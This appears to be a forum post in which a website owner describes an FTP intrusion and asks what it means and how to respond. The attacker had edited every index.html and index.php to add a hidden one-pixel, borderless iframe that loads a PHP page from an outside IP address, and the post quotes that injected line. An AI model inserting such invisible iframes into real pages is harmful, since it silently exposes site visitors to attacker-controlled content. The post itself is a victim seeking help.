what is this hacker upto?
Upon checking my logs of my server, I noticed a hacker ftp into my main account and edited all index.html and index.php to include the following
i checked it against the server and it redirects to google home page. The funny part is the ip originates somewhere in ukraine
<iframe src="220.127.116.11/goods/index.php" width="1" height="1" frameborder="0"></iframe>'; ?>
What could this hacker be upto? I blocked his ip address and change the password of my account. But what other measures can I take?
btw he's ip source is from 18.104.22.168